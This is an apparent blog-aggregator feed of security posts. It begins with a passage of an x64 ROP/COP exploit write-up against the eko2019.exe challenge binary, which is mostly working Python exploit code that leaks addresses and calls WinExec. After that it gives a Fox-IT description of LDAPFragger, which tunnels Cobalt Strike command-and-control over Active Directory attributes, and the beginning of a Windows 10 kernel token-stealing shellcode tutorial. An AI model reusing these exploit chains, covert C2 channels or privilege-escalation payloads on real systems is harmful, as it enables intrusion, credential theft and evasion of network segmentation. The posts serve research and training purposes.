# Indexing the response to view RAX (PEB)
receive = s.recv(1024)
peb_unpack = struct.unpack_from('<Q', receive)
peb_addr = peb_unpack[0]

print "[+] PEB is located at: {0}".format(hex(peb_addr))

# Closing the connection
s.close()

# Allow buffer room
sleep(2)

# 2nd stage

# 16 total bytes
print "[+] Sending the second header..."
exploit_2 = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 byte offset to the byte we control
exploit_2 += "\x41" * 512

# Just want a vanilla mov rax, qword ptr[rcx], which already exists- so sliding in with a NOP to this instruction
exploit_2 += "\x90"

# Padding to loading PEB+0x10 into rcx
exploit_2 += "\x41\x41\x41\x41\x41\x41\x41"
exploit_2 += struct.pack('<Q', peb_addr+0x10)

# Message needs to be 528 bytes total
exploit_2 += "\x41" * (544-len(exploit_2))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit_2)

# Indexing the response to view RAX (Base VA of eko2019.exe)
receive_2 = s.recv(1024)
base_va_unpack = struct.unpack_from('<Q', receive_2)
base_address = base_va_unpack[0]

print "[+] The base address for eko2019.exe is located at: {0}".format(hex(base_address))

# Closing the connection
s.close()

# Allow buffer room
sleep(2)

# 3rd stage

print "[+] Sending the third header..."
exploit_3 = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 byte offset to the byte we control
exploit_3 += "\x41" * 512

# Just want a vanilla mov rax, qword ptr[rcx], which already exists- so sliding in with a NOP to this instruction
exploit_3 += "\x90"

# Padding to load eko2019.exe+0x9010
exploit_3 += "\x41\x41\x41\x41\x41\x41\x41"
exploit_3 += struct.pack('<Q', base_address+0x9010)

# Message needs to be 528 bytes total
exploit_3 += "\x41" * (544-len(exploit_3))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit_3)

# Indexing the response to view RAX (VA of kernel32!WinExec)
receive_3 = s.recv(1024)
kernel32_unpack = struct.unpack_from('<Q', receive_3)
kernel32_winexec = kernel32_unpack[0]

print "[+] kernel32!WinExec is located at: {0}".format(hex(kernel32_winexec))

# Close the connection
s.close()

# 4th stage

# 16 total bytes
print "[+] Sending the fourth header..."
exploit_4 = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 byte offset to the byte we control
exploit_4 += "\x41" * 512

# push rcx (which we control)
exploit_4 += "\x51"

# Padding to load eko2019.exe+0x158b
exploit_4 += "\x41\x41\x41\x41\x41\x41\x41"
exploit_4 += struct.pack('<Q', base_address+0x158b)

# Message needs to be 528 bytes total
exploit_4 += "\x41" * (544-len(exploit_4))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit_4)

print "[+] Pivoted to the stack!"

# Don't need to index any data back through our read primitive, as we just want to stack pivot here
# Receiving data back from a connection is always best practice
s.recv(1024)

# Close the connection
s.close()

After executing the updated proof of concept, we continue execution to our move instruction as always. This time, we land on our intended push rcx instruction after executing the first two requests!

In addition, we can see RCX contains our specified ROP gadget!

After stepping through the push rcx instruction, we can see our ROP gadget gets loaded into RSP!

The next move instruction doesn’t matter to us at this point- as we are only worried about returning to the stack.

After we execute our ret to exit this function, we can clearly see that we have returned into our specified ROP gadget!

After we add to the value of RSP, we can see that when this ROP gadget returns- it will return into a region of memory that we control on the stack. We can view this via the Call stack in WinDbg.

Now that we have been able to successfully pivot back to the stack, it is time to attempt to pop calc.exe. Let’s start executing some useful ROP gadgets!

Recall that since we are working with the x64 architecture, we have to adhere to the __fastcall calling convention. As mentioned before, the registers we will use are:

  1. RCX -> First argument
  2. RDX -> Second argument
  3. R8 -> Third argument
  4. R9 -> Fourth argument
  5. RSP + 0x20 -> Fifth argument
  6. RSP + 0x28 -> Sixth argument
  7. etc.

A call to WinExec() is broken down as such, according to its documentation.

UINT WinExec(
  LPCSTR lpCmdLine,
  UINT   uCmdShow
);

This means that all we need to do, is place a value in RCX and RDX- as this function only takes two arguments.

Since we want to pop calc.exe, the first argument in this function should be a POINTER to an address that contains the string “calc”, which should be null terminated. This should be stored in RCX. lpCmdLine (the argument we are fulfilling) is the name of the application we would like to execute. Remember, this should be a pointer to the string.

The second argument, stored in RDX, is uCmdShow. These are the “display options”. The easiest option here, is to use SW_SHOWNORMAL- which just executes and displays the application normally. This means we will just need to place the value 0x1 into RDX, which is representative of SH_SHOWNORMAL.

Note- you can find all of these ROP gadgets from running rp++.

To start our ROP chain, we will just implement a “ROP NOP”, which will just return to the stack. This gadget is located at eko2019.exe+0x10a1

exploit_4 += struct.pack('<Q', base_address+0x10a1)			# ret: eko2019.exe

The next thing we would like to do, is get a pointer to the string “calc” into RCX. In order to do this, we are going to need to have write permissions to a memory address. Then, using a ROP gadget, we can overwrite what this address points to with our own value of “calc”, which is null terminated. Looking in IDA, we see only one of the sections that make up our executable has write permissions.

This means that we need to pick an address from the .data section within eko2019.exe to overwrite. The address we will use is eko2019.exe+0xC288- as it is the first available “blank” address.

We will place this address into RCX, via the following ROP/COP gadgets:

exploit_4 += struct.pack('<Q', base_address+0x1167)			# pop rax ; ret: eko2019.exe
exploit_4 += struct.pack('<Q', base_address+0xc288)			# First empty address in eko2019.exe .data section
exploit_4 += struct.pack('<Q', base_address+0x6375)			# mov rcx, rax ; call r12: eko2019.exe

In this program, there was only one ROP gadget that allowed us to control RCX in the manner we wished- which was mov rcx, rax ; call r12. Obviously, this gadget will not return to the stack like a ROP gadget- but it will call a register afterwards. This is what is known as “Call-Oriented Programming”, or COP. You may be asking “this address will not return to the stack- how will we keep executing”? There is an explanation for this!

Essentially, before we use the COP gadget, we can pop a ROP gadget into the register that will be called (e.g. R12 in this case). Then, when the COP gadget is executed and the register is called- it will be actually peforming a call to a ROP gadget we specify- which will be a return back to the stack in this case, via an add rsp, X instruction. Here is how this looks in totality.

# The next gadget is a COP gadget that does not return, but calls r12
# Placing an add rsp, 0x10 gadget to act as a "return" to the stack into r12
exploit_4 += struct.pack('<Q', base_address+0x4a8e)			# pop r12 ; ret: eko2019.exe
exploit_4 += struct.pack('<Q', base_address+0x8789)			# add rsp, 0x10 ; ret: eko2019.exe 

# Grabbing a blank address in eko2019.exe to write our calc string to and create a pointer (COP gadget)
# The blank address should come from the .data section, as IDA has shown this the only segment of the executable that is writeable
exploit_4 += struct.pack('<Q', base_address+0x1167)			# pop rax ; ret: eko2019.exe
exploit_4 += struct.pack('<Q', base_address+0xc288)			# First empty address in eko2019.exe .data section
exploit_4 += struct.pack('<Q', base_address+0x6375)			# mov rcx, rax ; call r12: eko2019.exe
exploit_4 += struct.pack('<Q', 0x4141414141414141)			# Padding from add rsp, 0x10

Great! This sequence will load a writeable address into the RCX register. The task now, is to somehow overwrite what this address is pointing to.

We stumble across another interesting ROP gadget that can help us achieve this goal!

mov qword [rcx], rax ; mov eax, 0x00000001 ; add rsp, 0x0000000000000080 ; pop rbx ; ret

This ROP gadget is from kernel32.dll. As you can recall, WinExec() is exported by kernel32.dll. This means we already have a valid address within kernel32.dll. Knowing this, we can find the distance between WinExec() and the base of kernel32.dll- which would allow us to dynamically resolve the base virtual address of kernel32.dll.

kernel32_base = kernel32_winexec-0x5e390

WinExec() is 0x5e390 bytes into kernel32.dll (on this version of Windows 10). Subtracting this value, will give us the base adddress of kernel32.dll! Now that we have resolved the base, this will allow us to calculate the offset and virtual memory address of our gadget in kernel32.dll dynamically.

Looking back at our ROP gadget- this gives us the ability to take the value in RAX and move it into the value POINTED TO by RCX. RCX already contains the address we would like to overwrite- so this is a perfect match! All we need to do now, is load the string “calc” (null terminated) into RAX! Here is what this looks like all put together.

# Creating a pointer to calc string
exploit_4 += struct.pack('<Q', base_address+0x1167)			# pop rax ; ret: eko2019.exe
exploit_4 += "calc\x00\x00\x00\x00"					# calc (with null terminator)
exploit_4 += struct.pack('<Q', kernel32_base+0x6130f)		        # mov qword [rcx], rax ; mov eax, 0x00000001 ; add rsp, 0x0000000000000080 ; pop rbx ; ret: kernel32.dll

# Padding for add rsp, 0x0000000000000080 and pop rbx
exploit_4 += "\x41" * 0x88

One things to keep in mind is that the ROP gadget that creates the pointer to “calc” (null terminated) has a few extra instructions on the end that we needed to compensate for.

The second parameter is much more straight forward. In kernel32.dll, we found another gadget that allows us to pop our own value into RDX.

# Placing second parameter into rdx
exploit_4 += struct.pack('<Q', kernel32_base+0x19daa)		# pop rdx ; add eax, 0x15FF0006 ; ret: kernel32.dll
exploit_4 += struct.pack('<Q', 0x01)			        # SH_SHOWNORMAL

Perfect! At this point, all we need to do is place the call to WinExec() on the stack! This is done with the following snippet of code.

# Calling kernel32!WinExec
exploit_4 += struct.pack('<Q', base_address+0x10a1)		# ret: eko2019.exe (ROP NOP)
exploit_4 += struct.pack('<Q', kernel32_winexec)	        # Address of kernel32!WinExec

In addition, we need to return to a valid address on the stack after the call to WinExec() so our prgram doesn’t crash after calc.exe is called. This is outlined below.

exploit_4 += struct.pack('<Q', base_address+0x89b6)			# add rsp, 0x48 ; ret: eko2019.exe
exploit_4 += "\x41" * 0x48 						# Padding to reach next ROP gadget
exploit_4 += struct.pack('<Q', base_address+0x89b6)			# add rsp, 0x48 ; ret: eko2019.exe
exploit_4 += "\x41" * 0x48 						# Padding to reach next ROP gadget
exploit_4 += struct.pack('<Q', base_address+0x89b6)			# add rsp, 0x48 ; ret: eko2019.exe
exploit_4 += "\x41" * 0x48 						# Padding to reach next ROP gadget
exploit_4 += struct.pack('<Q', base_address+0x2e71)			# add rsp, 0x38 ; ret: eko2019.exe

The final exploit code can be found here on my GitHub.

Let’s step through this final exploit in WinDbg to see how things break down.

We have already shown that our stack pivot was successful. After the pivot back to the stack and our ROP NOP which just returns back to the stack is executed, we can see that our pop r12 instruction has been hit. This will load a ROP gadget into R12 that will return to the stack- due to the fact our main ROP gadget calls R12, as explained earlier.

After we step through the instruction, we can see our ROP gadget for returning back to the stack has been loaded into R12.

We hit our next gadget, which pops the writeable address in the .data section of eko2019.exe into RAX. This value will be eventually placed into the RCX register- where the first function argument for WinExec() needs to be.

RAX now contains the blank, writeable address in the .data section.

After this gadget returns, we hit our main gadget of mov rcx, rax ; call r12.

The value of RAX is then placed into RCX. After this occurs, we can see that R12 is called and is going to execute our return back to the stack, add rsp, 0x10 ; ret.

Perfect! Our COP gadget and ROP gadgets worked together to load our intended address into RCX.

Next, we execute on our next pop rax gadget, which loads the value of “calc” into RAX (null terminated). 636c6163 = clac in hex to text. This is because we are compensating for the endianness of our processor (little endian).

We land on our most important ROP gadget to date after the return from the above gadget. This will take the string “calc” (null terminated) and point the address in RCX to it.

The address in RCX now points to the null terminated string “calc”.

Perfect! All we have to do now, is pop 0x1 into RDX- which has been completed by the subsequent ROP gadget.

Perfect! We have now landed on the call to WinExec()- and we can execute our shellcode!

All that is left to do now, is let everything run as intended!

Let’s run the final exploit.

Calc.exe FTW!

Big shoutout to Blue Frost Security for this binary- this was a very challenging experience and I feel I learned a lot from it. A big shout out as well to my friend @trickster012 for helping me with some of the problems I was having with __fastcall initially. Please contact me with any comments, questions, or corrections.

Peace, love, and positivity :-)

SLAE – Assignment #5: Metasploit Shellcode Analysis

By: voidsec
26 March 2020 at 13:52

Assignment #5: Metasploit Shellcode Analysis Fifth SLAE’s assignment requires to dissect and analyse three different Linux x86 Metasploit Payload. Metasploit currently has 35 different payloads but almost half of it are Meterpreter version, thus meaning staged payloads. I’ve then decided to skip meterpreter payloads as they involve multiple stages and higher complexity that will break […]

The post SLAE – Assignment #5: Metasploit Shellcode Analysis appeared first on VoidSec.

LDAPFragger: Command and Control over LDAP attributes

19 March 2020 at 10:15

Written by Rindert Kramer

Introduction

A while back during a penetration test of an internal network, we encountered physically segmented networks. These networks contained workstations joined to the same Active Directory domain, however only one network segment could connect to the internet. To control workstations in both segments remotely with Cobalt Strike, we built a tool that uses the shared Active Directory component to build a communication channel. For this, it uses the LDAP protocol which is commonly used to manage Active Directory, effectively routing beacon data over LDAP. This blogpost will go into detail about the development process, how the tool works and provides mitigation advice.

Scenario

A couple of months ago, we did a network penetration test at one of our clients. This client had multiple networks that were completely firewalled, so there was no direct connection possible between these network segments. Because of cost/workload efficiency reasons, the client chose to use the same Active Directory domain between those network segments. This is what it looked like from a high-level overview.

1

We had physical access on workstations in both segment A and segment B. In this example, workstations in segment A were able to reach the internet, while workstations in segment B could not. While we did have physical access on workstation in both network segments, we wanted to control workstations in network segment B from the internet.

Active Directory as a shared component

Both network segments were able to connect to domain controllers in the same domain and could interact with objects, authenticate users, query information and more. In Active Directory, user accounts are objects to which extra information can be added. This information is stored in attributes. By default, user accounts have write permissions on some of these attributes. For example, users can update personal information such as telephone numbers or office locations for their own account. No special privileges are needed for this, since this information is writable for the identity SELF, which is the account itself. This is configured in the Active Directory schema, as can be seen in the screenshot below.

2

Personal information, such as a telephone number or street address, is by default readable for every authenticated user in the forest. Below is a screenshot that displays the permissions for public information for the Authenticated Users identity.

3

The permissions set in the screenshot above provide access to the attributes defined in the Personal-Information property set. This property set contains 40+ attributes that users can read from and write to. The complete list of attributes can be found in the following article: https://docs.microsoft.com/en-us/windows/win32/adschema/r-personal-information
By default, every user that has successfully been authenticated within the same forest is an ‘authenticated user’. This means we can use Active Directory as a temporary data store and exchange data between the two isolated networks by writing the data to these attributes and then reading the data from the other segment.
If we have access to a user account, we can use that user account in both network segments simultaneously to exchange data over Active Directory. This will work, regardless of the security settings of the workstation, since the account will communicate directly to the domain controller instead of the workstation.

To route data over LDAP we need to get code execution privileges first on workstations in both segments. To achieve this, however, is up to the reader and beyond the scope of this blogpost.
To route data over LDAP, we would write data into one of the attributes and read the data from the other network segment.
In a typical scenario where we want to execute ipconfigon a workstation in network Segment B from a workstation in network Segment A, we would write the ipconfig command into an attribute, read the ipconfig command from network segment B, execute the command and write the results back into the attribute.

This process is visualized in the following overview:

4

A sample script to utilize this can be found on our GitHub page: https://github.com/fox-it/LDAPFragger/blob/master/LDAPChannel.ps1

While this works in practice to communicate between segmented networks over Active Directory, this solution is not ideal. For example, this channel depends on the replication of data between domain controllers. If you write a message to domain controller A, but read the message from domain controller B, you might have to wait for the domain controllers to replicate in order to get the data. In addition, in the example above we used to info-attribute to exchange data over Active Directory. This attribute can hold up to 1024 bytes of information. But what if the payload exceeds that size? More issues like these made this solution not an ideal one.

Lastly, people already built some proof of concepts doing the exact same thing. Harmj0y wrote an excellent blogpost about this technique: https://www.harmj0y.net/blog/powershell/command-and-control-using-active-directory/

That is why we decided to build an advanced LDAP communication channel that fixes these issues.

Building an advanced LDAP channel

In the example above, the info-attribute is used. This is not an ideal solution, because what if the attribute already contains data or if the data ends up in a GUI somewhere?

To find other attributes, all attributes from the Active Directory schema are queried and:

  • Checked if the attribute contains data;
  • If the user has write permissions on it;
  • If the contents can be cleared.

If this all checks out, the name and the maximum length of the attribute is stored in an array for later usage.

Visually, the process flow would look like this:

5

As for (payload) data not ending up somewhere in a GUI such as an address book, we did not find a reliable way to detect whether an attribute ends up in a GUI or not, so attributes such as telephoneNumber are added to an in-code blacklist. For now, the attribute with the highest maximum length is selected from the array with suitable attributes, for speed and efficiency purposes. We refer to this attribute as the ‘data-attribute’ for the rest of this blogpost.

Sharing the attribute name
Now that we selected the data-attribute, we need to find a way to share the name of this attribute from the sending network segment to the receiving side. As we want the LDAP channel to be as stealthy as possible, we did not want to share the name of the chosen attribute directly.

In order to overcome this hurdle we decided to use hashing. As mentioned, all attributes were queried in order to select a suitable attribute to exchange data over LDAP. These attributes are stored in a hashtable, together with the CRC representation of the attribute name. If this is done in both network segments, we can share the hash instead of the attribute name, since the hash will resolve to the actual name of the attribute, regardless where the tool is used in the domain.

Avoiding replication issues
Chances are that the transfer rate of the LDAP channel is higher than the replication occurrence between domain controllers. The easy fix for this is to communicate to the same domain controller.
That means that one of the clients has to select a domain controller and communicate the name of the domain controller to the other client over LDAP.

The way this is done is the same as with sharing the name of the data-attribute. When the tool is started, all domain controllers are queried and stored in a hashtable, together with the CRC representation of the fully qualified domain name (FQDN) of the domain controller. The hash of the domain controller that has been selected is shared with the other client and resolved to the actual FQDN of the domain controller.

Initially sharing data
We now have an attribute to exchange data, we can share the name of the attribute in an obfuscated way and we can avoid replication issues by communicating to the same domain controller. All this information needs to be shared before communication can take place.
Obviously, we cannot share this information if the attribute to exchange data with has not been communicated yet (sort of a chicken-egg problem).

The solution for this is to make use of some old attributes that can act as a placeholder. For the tool, we chose to make use of one the following attributes:

  • primaryInternationalISDNNumber;
  • otherFacsimileTelephoneNumber;
  • primaryTelexNumber.

These attributes are part of the Personal-Information property set, and have been part of that since Windows 2000 Server. One of these attributes is selected at random to store the initial data.
We figured that the chance that people will actually use these attributes are low, but time will tell if that is really the case 😉

Message feedback
If we send a message over LDAP, we do not know if the message has been received correctly and if the integrity has been maintained during the transmission. To know if a message has been received correctly, another attribute will be selected – in the exact same way as the data-attribute – that is used to exchange information regarding that message. In this attribute, a CRC checksum is stored and used to verify if the correct message has been received.

In order to send a message between the two clients – Alice and Bob –, Alice would first calculate the CRC value of the message that she is about to send herself, before she sends it over to Bob over LDAP. After she sent it to Bob, Alice will monitor Bob’s CRC attribute to see if it contains data. If it contains data, Alice will verify whether the data matches the CRC value that she calculated herself. If that is a match, Alice will know that the message has been received correctly.
If it does not match, Alice will wait up until 1 second in 100 millisecond intervals for Bob to post the correct CRC value.

6

The process on the receiving end is much simpler. After a new message has been received, the CRC is calculated and written to the CRC attribute after which the message will be processed.

7

Fragmentation
Another challenge that we needed to overcome is that the maximum length of the attribute will probably be smaller than the length of the message that is going to be sent over LDAP. Therefore, messages that exceed the maximum length of the attribute need to be fragmented.
The message itself contains the actual data, number of parts and a message ID for tracking purposes. This is encoded into a base64 string, which will add an additional 33% overhead.
The message is then fragmented into fragments that would fit into the attribute, but for that we need to know how much information we can store into said attribute.
Every attribute has a different maximum length, which can be looked up in the Active Directory schema. The screenshot below displays the maximum length of the info-attribute, which is 1024.

8

At the start of the tool, attribute information such as the name and the maximum length of the attribute is saved. The maximum length of the attribute is used to fragment messages into the correct size, which will fit into the attribute. If the maximum length of the data-attribute is 1024 bytes, a message of 1536 will be fragmented into a message of 1024 bytes and a message of 512 bytes.
After all fragments have been received, the fragments are put back into the original message. By also using CRC, we can send big files over LDAP. Depending on the maximum length of the data-attribute that has been selected, the transfer speed of the channel can be either slow or okay.

Autodiscover
The working of the LDAP channel depends on (user) accounts. Preferably, accounts should not be statically configured, so we needed a way for clients both finding each other independently.
Our ultimate goal was to route a Cobalt Strike beacon over LDAP. Cobalt Strike has an experimental C2 interface that can be used to create your own transport channel. The external C2 server will create a DLL injectable payload upon request, which can be injected into a process, which will start a named pipe server. The name of the pipe as well as the architecture can be configured. More information about this can be read at the following location: https://www.cobaltstrike.com/help-externalc2

Until now, we have gathered the following information:

  • 8 bytes – Hash of data-attribute
  • 8 bytes – Hash of CRC-attribute
  • 8 bytes – Hash of domain controller FQDN

Since the name of the pipe as well as the architecture are configurable, we need more information:

  • 8 bytes – Hash of the system architecture
  • 8 bytes – Pipe name

The hash of the system architecture is collected in the same way as the data, CRC and domain controller attribute. The name of the pipe is a randomized string of eight characters. All this information is concatenated into a string and posted into one of the placeholder attributes that we defined earlier:

  • primaryInternationalISDNNumber;
  • otherFacsimileTelephoneNumber;
  • primaryTelexNumber.

The tool will query the Active Directory domain for accounts where one of each of these attributes contains data. If found and parsed successfully, both clients have found each other but also know which domain controller is used in the process, which attribute will contain the data, which attribute will contain the CRC checksums of the data that was received but also the additional parameters to create a payload with Cobalt Strike’s external C2 listener. After this process, the information is removed from the placeholder attribute.
Until now, we have not made a distinction between clients. In order to make use of Cobalt Strike, you need a workstation that is allowed to create outbound connections. This workstation can be used to act as an implant to route the traffic over LDAP to another workstation that is not allowed to create outbound connections. Visually, it would something like this.

9

Let us say that we have our tool running in segment A and segment B – Alice and Bob. All information that is needed to communicate over LDAP and to generate a payload with Cobalt Strike is already shared between Alice and Bob. Alice will forward this information to Cobalt Strike and will receive a custom payload that she will transfer to Bob over LDAP. After Bob has received the payload, Bob will start a new suspended child process and injects the payload into this process, after which the named pipe server will start. Bob now connects to the named pipe server, and sends all data from the pipe server over LDAP to Alice, which on her turn will forward it to Cobalt Strike. Data from Cobalt Strike is sent to Alice, which she will forward to Bob over LDAP, and this process will continue until the named pipe server is terminated or one of the systems becomes unavailable for whatever reason. To visualize this in a nice process flow, we used the excellent format provided in the external C2 specification document.

10

After a new SMB beacon has been spawned in Cobalt Strike, you can interact with it just as you would normally do. For example, you can run MimiKatz to dump credentials, browse the local hard drive or start a VNC stream.
The tool has been made open source. The source code can be found here: https://github.com/fox-it/LDAPFragger

11

The tool is easy to use: Specifying the cshost and csport parameter will result in the tool acting as the proxy that will route data from and to Cobalt Strike. Specifying AD credentials is not necessary if integrated AD authentication is used. More information can be found on the Github page. Please do note that the default Cobalt Strike payload will get caught by modern AVs. Bypassing AVs is beyond the scope of this blogpost.

Why a C2 LDAP channel?

This solution is ideal in a situation where network segments are completely segmented and firewalled but still share the same Active Directory domain. With this channel, you can still create a reliable backdoor channel to parts of the internal network that are otherwise unreachable for other networks, if you manage to get code execution privileges on systems in those networks. Depending on the chosen attribute, speeds can be okay but still inferior to the good old reverse HTTPS channel. Furthermore, no special privileges are needed and it is hard to detect.

Remediation

In order to detect an LDAP channel like this, it would be necessary to have a baseline identified first. That means that you need to know how much traffic is considered normal, the type of traffic, et cetera. After this information has been identified, then you can filter out the anomalies, such as:

Monitor the usage of the three static placeholders mentioned earlier in this blogpost might seem like a good tactic as well, however, that would be symptom-based prevention as it is easy for an attacker to use different attributes, rendering that remediation tactic ineffective if attackers change the attributes.

SLAE – Assignment #4: Custom shellcode encoder

By: voidsec
17 March 2020 at 11:08

Assignment #4: Custom Shellcode Encoder As the 4th SLAE’s assignment I was required to build a custom shellcode encoder for the execve payload, which I did, here how. Encoder Implementations I’ve decided to not relay on XORing functionalities as most antivirus solutions are now well aware of this encoding schema, the same reason for which […]

The post SLAE – Assignment #4: Custom shellcode encoder appeared first on VoidSec.

Perform a Nessus scan via port forwarding rules only

By: voidsec
13 March 2020 at 09:34

This post will be a bit different from the usual technical stuff, mostly because I was not able to find any reliable solution on Internet and I would like to help other people having the same doubt/question, it’s nothing advanced, it’s just something useful that I didn’t see posted before. During a recent engagement I […]

The post Perform a Nessus scan via port forwarding rules only appeared first on VoidSec.

SLAE – Assignment #3: Egghunter

By: voidsec
20 February 2020 at 15:25

Assignment #3: Egghunter This time the assignment was very interesting, here the requirements: study an egg hunting shellcode and create a working demo, it should be configurable for different payloads. As many before me, I’ve started my research journey with Skape’s papers: “Searching Process Virtual Address Space”. I was honestly amazed by the paper content, […]

The post SLAE – Assignment #3: Egghunter appeared first on VoidSec.

Exploit Development: Panic! At The Kernel - Token Stealing Payloads Revisited on Windows 10 x64 and Bypassing SMEP

1 February 2020 at 00:00

Introduction

Same ol’ story with this blog post- I am continuing to expand my research/overall knowledge on Windows kernel exploitation, in addition to garnering more experience with exploit development in general. Previously I have talked about a couple of vulnerability classes on Windows 7 x86, which is an OS with minimal protections. With this post, I wanted to take a deeper dive into token stealing payloads, which I have previously talked about on x86, and see what differences the x64 architecture may have. In addition, I wanted to try to do a better job of explaining how these payloads work. This post and research also aims to get myself more familiar with the x64 architecture, which is a far more common in 2020, and understand protections such as Supervisor Mode Execution Prevention (SMEP).

Gimme Dem Tokens!

As apart of Windows, there is something known as the SYSTEM process. The SYSTEM process, PID of 4, houses the majority of kernel mode system threads. The threads stored in the SYSTEM process, only run in context of kernel mode. Recall that a process is a “container”, of sorts, for threads. A thread is the actual item within a process that performs the execution of code. You may be asking “How does this help us?” Especially, if you did not see my last post. In Windows, each process object, known as _EPROCESS, has something known as an access token. Recall that an object is a dynamically created (configured at runtime) structure. Continuing on, this access token determines the security context of a process or a thread. Since the SYSTEM process houses execution of kernel mode code, it will need to run in a security context that allows it to access the kernel. This would require system or administrative privilege. This is why our goal will be to identify the access token value of the SYSTEM process and copy it to a process that we control, or the process we are using to exploit the system. From there, we can spawn cmd.exe from the now privileged process, which will grant us NT AUTHORITY\SYSTEM privileged code execution.

Identifying the SYSTEM Process Access Token

We will use Windows 10 x64 to outline this overall process. First, boot up WinDbg on your debugger machine and start a kernel debugging session with your debugee machine (see my post on setting up a debugging enviornment). In addition, I noticed on Windows 10, I had to execute the following command on my debugger machine after completing the bcdedit.exe commands from my previous post: bcdedit.exe /dbgsettings serial debugport:1 baudrate:115200)

Once that is setup, execute the following command, to dump the active processes:

!process 0 0

This returns a few fields of each process. We are most interested in the “process address”, which has been outlined in the image above at address 0xffffe60284651040. This is the address of the _EPROCESS structure for a specified process (the SYSTEM process in this case). After enumerating the process address, we can enumerate much more detailed information about process using the _EPROCESS structure.

dt nt!_EPROCESS <Process address>

dt will display information about various variables, data types, etc. As you can see from the image above, various data types of the SYSTEM process’s _EPROCESS structure have been displayed. If you continue down the kd window in WinDbg, you will see the Token field, at an offset of _EPROCESS + 0x358.

What does this mean? That means for each process on Windows, the access token is located at an offset of 0x358 from the process address. We will for sure be using this information later. Before moving on, however, let’s take a look at how a Token is stored.

As you can see from the above image, there is something called _EX_FAST_REF, or an Executive Fast Reference union. The difference between a union and a structure, is that a union stores data types at the same memory location (notice there is no difference in the offset of the various fields to the base of an _EX_FAST_REF union as shown in the image below. All of them are at an offset of 0x000). This is what the access token of a process is stored in. Let’s take a closer look.

dt nt!_EX_FAST_REF

Take a look at the RefCnt element. This is a value, appended to the access token, that keeps track of references of the access token. On x86, this is 3 bits. On x64 (which is our current architecture) this is 4 bits, as shown above. We want to clear these bits out, using bitwise AND. That way, we just extract the actual value of the Token, and not other unnecessary metadata.

To extract the value of the token, we simply need to view the _EX_FAST_REF union of the SYSTEM process at an offset of 0x358 (which is where our token resides). From there, we can figure out how to go about clearing out RefCnt.

dt nt!_EX_FAST_REF <Process address>+0x358

As you can see, RefCnt is equal to 0y0111. 0y denotes a binary value. So this means RefCnt in this instance equals 7 in decimal.

So, let’s use bitwise AND to try to clear out those last few bits.

? TOKEN & 0xf

As you can see, the result is 7. This is not the value we want- it is actually the inverse of it. Logic tells us, we should take the inverse of 0xf, -0xf.

So- we have finally extracted the value of the raw access token. At this point, let’s see what happens when we copy this token to a normal cmd.exe session.

Openenig a new cmd.exe process on the debuggee machine:

After spawning a cmd.exe process on the debuggee, let’s identify the process address in the debugger.

!process 0 0 cmd.exe

As you can see, the process address for our cmd.exe process is located at 0xffffe6028694d580. We also know, based on our research earlier, that the Token of a process is located at an offset of 0x358 from the process address. Let’s Use WinDbg to overwrite the cmd.exe access token with the access token of the SYSTEM process.

Now, let’s take a look back at our previous cmd.exe process.

As you can see, cmd.exe has become a privileged process! Now the only question remains- how do we do this dynamically with a piece of shellcode?

Assembly? Who Needs It. I Will Never Need To Know That- It’s iRrElEvAnT

‘Nuff said.

Anyways, let’s develop an assembly program that can dynamically perform the above tasks in x64.

So let’s start with this logic- instead of spawning a cmd.exe process and then copying the SYSTEM process access token to it- why don’t we just copy the access token to the current process when exploitation occurs? The current process during exploitation should be the process that triggers the vulnerability (the process where the exploit code is ran from). From there, we could spawn cmd.exe from (and in context) of our current process after our exploit has finished. That cmd.exe process would then have administrative privilege.

Before we can get there though, let’s look into how we can obtain information about the current process.

If you use the Microsoft Docs (formerly known as MSDN) to look into process data structures you will come across this article. This article states there is a Windows API function that can identify the current process and return a pointer to it! PsGetCurrentProcessId() is that function. This Windows API function identifies the current thread and then returns a pointer to the process in which that thread is found. This is identical to IoGetCurrentProcess(). However, Microsoft recommends users invoke PsGetCurrentProgress() instead. Let’s unassemble that function in WinDbg.

uf nt!PsGetCurrentProcess

Let’s take a look at the first instruction mov rax, qword ptr gs:[188h]. As you can see, the GS segment register is in use here. This register points to a data segment, used to access different types of data structures. If you take a closer look at this segment, at an offset of 0x188 bytes, you will see KiInitialThread. This is a pointer to the _KTHREAD entry in the current threads _ETHREAD structure. As a point of contention, know that _KTHREAD is the first entry in _ETHREAD structure. The _ETHREAD structure is the thread object for a thread (similar to how _EPROCESS is the process object for a process) and will display more granular information about a thread. nt!KiInitialThread is the address of that _ETHREAD structure. Let’s take a closer look.

dqs gs:[188h]

This shows the GS segment register, at an offset of 0x188, holds an address of 0xffffd500e0c0cc00 (different on your machine because of ASLR/KASLR). This should be the nt!KiInitialThread, or the _ETHREAD structure for the current thread. Let’s verify this with WinDbg.

!thread -p

As you can see, we have verified that nt!KiInitialThread represents the address of the current thread.

Recall what was mentioned about threads and processes earlier. Threads are the part of a process that actually perform execution of code (for our purposes, these are kernel threads). Now that we have identified the current thread, let’s identify the process associated with that thread (which would be the current process). Let’s go back to the image above where we unassembled the PsGetCurrentProcess() function.

mov rax, qword ptr [rax,0B8h]

RAX alread contains the value of the GS segment register at an offset of 0x188 (which contains the current thread). The above assembly instruction will move the value of nt!KiInitialThread + 0xB8 into RAX. Logic tells us this has to be the location of our current process, as the only instruction left in the PsGetCurrentProcess() routine is a ret. Let’s investigate this further.

Since we believe this is going to be our current process, let’s view this data in an _EPROCESS structure.

dt nt!_EPROCESS poi(nt!KiInitialThread+0xb8)

First, a little WinDbg kung-fu. poi essentially dereferences a pointer, which means obtaining the value a pointer points to.

And as you can see, we have found where our current proccess is! The PID for the current process at this time is the SYSTEM process (PID = 4). This is subject to change dependent on what is executing, etc. But, it is very important we are able to identify the current process.

Let’s start building out an assembly program that tracks what we are doing.

; Windows 10 x64 Token Stealing Payload
; Author: Connor McGarr

[BITS 64]

_start:
	mov rax, [gs:0x188]		    ; Current thread (_KTHREAD)
	mov rax, [rax + 0xb8]	   	    ; Current process (_EPROCESS)
  	mov rbx, rax			    ; Copy current process (_EPROCESS) to rbx

